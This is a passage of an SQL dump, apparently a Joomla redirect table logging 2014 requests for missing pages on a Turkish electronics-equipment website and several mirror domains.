00:00:00',301),(1023,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',6,0,'2014-08-05 14:58:41','0000-00-00 00:00:00',301),(1024,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=124&Itemid=130','','','',5,0,'2014-08-05 15:23:07','0000-00-00 00:00:00',301),(1025,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',13,0,'2014-08-05 15:39:49','0000-00-00 00:00:00',301),(1026,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',15,0,'2014-08-05 15:41:21','0000-00-00 00:00:00',301),(1027,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=&lang=en','','','',1,0,'2014-08-05 15:42:18','0000-00-00 00:00:00',301),(1028,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',4,0,'2014-08-05 15:42:38','0000-00-00 00:00:00',301),(1029,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',4,0,'2014-08-05 15:42:39','0000-00-00 00:00:00',301),(1030,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',2,0,'2014-08-05 15:43:48','0000-00-00 00:00:00',301),(1031,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',9,0,'2014-08-05 15:46:33','0000-00-00 00:00:00',301),(1032,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',4,0,'2014-08-05 15:46:56','0000-00-00 00:00:00',301),(1033,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',6,0,'2014-08-05 15:47:14','0000-00-00 00:00:00',301),(1034,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',5,0,'2014-08-05 15:50:08','0000-00-00 00:00:00',301),(1035,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',8,0,'2014-08-05 15:50:21','0000-00-00 00:00:00',301),(1036,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',1,0,'2014-08-05 15:50:42','0000-00-00 00:00:00',301),(1037,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',1,0,'2014-08-05 15:51:06','0000-00-00 00:00:00',301),(1038,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',1,0,'2014-08-05 15:57:55','0000-00-00 00:00:00',301),(1039,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',28,0,'2014-08-05 16:02:18','0000-00-00 00:00:00',301),(1040,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',4,0,'2014-08-05 16:15:50','0000-00-00 00:00:00',301),(1041,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=&lang=tr','','','',1,0,'2014-08-05 16:29:46','0000-00-00 00:00:00',301),(1042,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',24,0,'2014-08-05 16:31:33','0000-00-00 00:00:00',301),(1043,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',12,0,'2014-08-05 16:34:52','0000-00-00 00:00:00',301),(1044,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=53&Itemid=110','','','',9,0,'2014-08-05 16:41:31','0000-00-00 00:00:00',301),(1045,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',15,0,'2014-08-05 16:52:38','0000-00-00 00:00:00',301),(1046,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',4,0,'2014-08-05 16:57:28','0000-00-00 00:00:00',301),(1047,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',13,0,'2014-08-05 17:06:51','0000-00-00 00:00:00',301),(1048,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',20,0,'2014-08-05 17:07:58','0000-00-00 00:00:00',301),(1049,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',30,0,'2014-08-05 17:09:59','0000-00-00 00:00:00',301),(1050,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',30,0,'2014-08-05 17:10:04','0000-00-00 00:00:00',301),(1051,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',3,0,'2014-08-05 17:10:14','0000-00-00 00:00:00',301),(1052,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138','','','',7,0,'2014-08-05 17:12:57','0000-00-00 00:00:00',301),(1053,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',1,0,'2014-08-05 17:14:00','0000-00-00 00:00:00',301),(1054,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',54,0,'2014-08-05 17:17:28','0000-00-00 00:00:00',301),(1055,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41&Itemid=55','','','',6,0,'2014-08-05 17:21:31','0000-00-00 00:00:00',301),(1056,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',3,0,'2014-08-05 17:28:18','0000-00-00 00:00:00',301),(1057,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',35,0,'2014-08-05 17:45:02','0000-00-00 00:00:00',301),(1058,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',2,0,'2014-08-05 17:45:21','0000-00-00 00:00:00',301),(1059,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',5,0,'2014-08-05 18:04:22','0000-00-00 00:00:00',301),(1060,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',3,0,'2014-08-05 18:11:47','0000-00-00 00:00:00',301),(1061,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',18,0,'2014-08-05 18:18:33','0000-00-00 00:00:00',301),(1062,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',1,0,'2014-08-05 18:25:22','0000-00-00 00:00:00',301),(1063,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',17,0,'2014-08-05 18:32:10','0000-00-00 00:00:00',301),(1064,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',33,0,'2014-08-05 19:53:36','0000-00-00 00:00:00',301),(1065,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',1,0,'2014-08-05 20:06:02','0000-00-00 00:00:00',301),(1066,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr&limitstart=10','','','',6,0,'2014-08-05 20:15:51','0000-00-00 00:00:00',301),(1067,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',3,0,'2014-08-05 20:35:51','0000-00-00 00:00:00',301),(1068,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',4,0,'2014-08-05 20:40:20','0000-00-00 00:00:00',301),(1069,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',4,0,'2014-08-05 21:04:25','0000-00-00 00:00:00',301),(1070,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103','','','',3,0,'2014-08-05 21:07:17','0000-00-00 00:00:00',301),(1071,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',4,0,'2014-08-05 21:08:33','0000-00-00 00:00:00',301),(1072,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',44,0,'2014-08-05 21:18:40','0000-00-00 00:00:00',301),(1073,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',1,0,'2014-08-05 21:33:41','0000-00-00 00:00:00',301),(1074,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131','','','',4,0,'2014-08-05 21:33:54','0000-00-00 00:00:00',301),(1075,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',1,0,'2014-08-05 21:56:07','0000-00-00 00:00:00',301),(1076,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',5,0,'2014-08-05 22:21:34','0000-00-00 00:00:00',301),(1077,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',6,0,'2014-08-05 22:27:18','0000-00-00 00:00:00',301),(1078,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',6,0,'2014-08-05 22:29:13','0000-00-00 00:00:00',301),(1079,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',7,0,'2014-08-05 22:32:59','0000-00-00 00:00:00',301),(1080,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',7,0,'2014-08-05 22:35:51','0000-00-00 00:00:00',301),(1081,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',18,0,'2014-08-05 22:38:42','0000-00-00 00:00:00',301),(1082,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',5,0,'2014-08-05 22:45:57','0000-00-00 00:00:00',301),(1083,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',14,0,'2014-08-05 22:47:36','0000-00-00 00:00:00',301),(1084,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',6,0,'2014-08-05 22:58:43','0000-00-00 00:00:00',301),(1085,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130','','','',8,0,'2014-08-05 23:07:17','0000-00-00 00:00:00',301),(1086,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',12,0,'2014-08-05 23:11:55','0000-00-00 00:00:00',301),(1087,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=49&Itemid=0&lang=en','','','',1,0,'2014-08-06 00:03:40','0000-00-00 00:00:00',301),(1088,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',2,0,'2014-08-06 00:04:25','0000-00-00 00:00:00',301),(1089,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=&lang=tr','','','',1,0,'2014-08-06 00:06:00','0000-00-00 00:00:00',301),(1090,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',12,0,'2014-08-06 00:11:20','0000-00-00 00:00:00',301),(1091,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',2,0,'2014-08-06 00:12:18','0000-00-00 00:00:00',301),(1092,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',7,0,'2014-08-06 00:44:50','0000-00-00 00:00:00',301),(1093,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',1,0,'2014-08-06 01:07:22','0000-00-00 00:00:00',301),(1094,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',9,0,'2014-08-06 01:10:08','0000-00-00 00:00:00',301),(1095,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107','','','',5,0,'2014-08-06 01:12:59','0000-00-00 00:00:00',301),(1096,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',10,0,'2014-08-06 01:38:56','0000-00-00 00:00:00',301),(1097,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',10,0,'2014-08-06 01:42:09','0000-00-00 00:00:00',301),(1098,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',21,0,'2014-08-06 01:44:10','0000-00-00 00:00:00',301),(1099,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',3,0,'2014-08-06 01:47:17','0000-00-00 00:00:00',301),(1100,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default','','','',7,0,'2014-08-06 01:49:36','0000-00-00 00:00:00',301),(1101,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',5,0,'2014-08-06 01:55:25','0000-00-00 00:00:00',301),(1102,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',3,0,'2014-08-06 01:58:42','0000-00-00 00:00:00',301),(1103,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',2,0,'2014-08-06 02:07:16','0000-00-00 00:00:00',301),(1104,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164','','','',7,0,'2014-08-06 02:22:03','0000-00-00 00:00:00',301),(1105,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',11,0,'2014-08-06 02:24:03','0000-00-00 00:00:00',301),(1106,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default','','','',5,0,'2014-08-06 02:29:03','0000-00-00 00:00:00',301),(1107,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',3,0,'2014-08-06 02:44:28','0000-00-00 00:00:00',301),(1108,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default','','','',8,0,'2014-08-06 02:47:16','0000-00-00 00:00:00',301),(1109,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',3,0,'2014-08-06 02:48:38','0000-00-00 00:00:00',301),(1110,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default','','','',4,0,'2014-08-06 02:58:41','0000-00-00 00:00:00',301),(1111,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',3,0,'2014-08-06 03:07:16','0000-00-00 00:00:00',301),(1112,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',4,0,'2014-08-06 03:32:50','0000-00-00 00:00:00',301),(1113,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',4,0,'2014-08-06 04:02:52','0000-00-00 00:00:00',301),(1114,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',13,0,'2014-08-06 04:03:27','0000-00-00 00:00:00',301),(1115,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',7,0,'2014-08-06 04:07:16','0000-00-00 00:00:00',301),(1116,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',2,0,'2014-08-06 04:18:49','0000-00-00 00:00:00',301),(1117,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',8,0,'2014-08-06 04:41:19','0000-00-00 00:00:00',301),(1118,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-06 04:49:11','0000-00-00 00:00:00',301),(1119,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',1,0,'2014-08-06 04:57:10','0000-00-00 00:00:00',301),(1120,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=&lang=tr','','','',1,0,'2014-08-06 05:02:00','0000-00-00 00:00:00',301),(1121,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',7,0,'2014-08-06 05:30:07','0000-00-00 00:00:00',301),(1122,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',4,0,'2014-08-06 05:43:58','0000-00-00 00:00:00',301),(1123,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',28,0,'2014-08-06 05:50:45','0000-00-00 00:00:00',301),(1124,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',8,0,'2014-08-06 05:50:49','0000-00-00 00:00:00',301),(1125,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',8,0,'2014-08-06 05:50:52','0000-00-00 00:00:00',301),(1126,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',8,0,'2014-08-06 05:50:56','0000-00-00 00:00:00',301),(1127,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',8,0,'2014-08-06 05:51:00','0000-00-00 00:00:00',301),(1128,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',8,0,'2014-08-06 05:51:05','0000-00-00 00:00:00',301),(1129,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',8,0,'2014-08-06 05:51:09','0000-00-00 00:00:00',301),(1130,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',8,0,'2014-08-06 05:51:15','0000-00-00 00:00:00',301),(1131,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',8,0,'2014-08-06 05:51:19','0000-00-00 00:00:00',301),(1132,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',8,0,'2014-08-06 05:51:23','0000-00-00 00:00:00',301),(1133,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',8,0,'2014-08-06 05:51:27','0000-00-00 00:00:00',301),(1134,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',32,0,'2014-08-06 05:51:32','0000-00-00 00:00:00',301),(1135,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',31,0,'2014-08-06 05:51:36','0000-00-00 00:00:00',301),(1136,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',8,0,'2014-08-06 05:51:41','0000-00-00 00:00:00',301),(1137,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',8,0,'2014-08-06 05:51:45','0000-00-00 00:00:00',301),(1138,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',31,0,'2014-08-06 05:51:49','0000-00-00 00:00:00',301),(1139,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',8,0,'2014-08-06 05:51:55','0000-00-00 00:00:00',301),(1140,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',8,0,'2014-08-06 05:52:05','0000-00-00 00:00:00',301),(1141,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',8,0,'2014-08-06 05:52:24','0000-00-00 00:00:00',301),(1142,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',8,0,'2014-08-06 05:52:29','0000-00-00 00:00:00',301),(1143,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',8,0,'2014-08-06 05:52:34','0000-00-00 00:00:00',301),(1144,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',94,0,'2014-08-06 06:04:24','0000-00-00 00:00:00',301),(1145,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',11,0,'2014-08-06 06:12:58','0000-00-00 00:00:00',301),(1146,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/kart-temizlemesi','','','',7,0,'2014-08-06 06:14:10','0000-00-00 00:00:00',301),(1147,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123','','','',8,0,'2014-08-06 06:18:41','0000-00-00 00:00:00',301),(1148,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',6,0,'2014-08-06 06:24:24','0000-00-00 00:00:00',301),(1149,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79','','','',2,0,'2014-08-06 06:30:07','0000-00-00 00:00:00',301),(1150,'http://www.3s-technologies.com.tr/index.php?option=com_community&view=frontpage&140806-084313','','','',1,0,'2014-08-06 06:43:09','0000-00-00 00:00:00',301),(1151,'http://www.3s-technologies.com.tr/index.php?140806-084313','','','',1,0,'2014-08-06 06:43:10','0000-00-00 00:00:00',301),(1152,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_community&view=frontpage&140806-084315','','','',1,0,'2014-08-06 06:43:12','0000-00-00 00:00:00',301),(1153,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?140806-084316','','','',1,0,'2014-08-06 06:43:12','0000-00-00 00:00:00',301),(1154,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_community&view=frontpage&140806-084317','','','',1,0,'2014-08-06 06:43:14','0000-00-00 00:00:00',301),(1155,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?140806-084318','','','',1,0,'2014-08-06 06:43:14','0000-00-00 00:00:00',301),(1156,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_community&view=frontpage&140806-084319','','','',1,0,'2014-08-06 06:43:16','0000-00-00 00:00:00',301),(1157,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?140806-084320','','','',1,0,'2014-08-06 06:43:16','0000-00-00 00:00:00',301),(1158,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_community&view=frontpage&140806-084321','','','',1,0,'2014-08-06 06:43:18','0000-00-00 00:00:00',301),(1159,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?140806-084321','','','',1,0,'2014-08-06 06:43:18','0000-00-00 00:00:00',301),(1160,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',1,0,'2014-08-06 06:50:33','0000-00-00 00:00:00',301),(1161,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',1,0,'2014-08-06 06:53:41','0000-00-00 00:00:00',301),(1162,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',93,0,'2014-08-06 07:07:15','0000-00-00 00:00:00',301),(1163,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',1,0,'2014-08-06 07:17:28','0000-00-00 00:00:00',301),(1164,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',3,0,'2014-08-06 07:18:14','0000-00-00 00:00:00',301),(1165,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',4,0,'2014-08-06 07:27:09','0000-00-00 00:00:00',301),(1166,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',7,0,'2014-08-06 07:27:19','0000-00-00 00:00:00',301),(1167,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28','','','',2,0,'2014-08-06 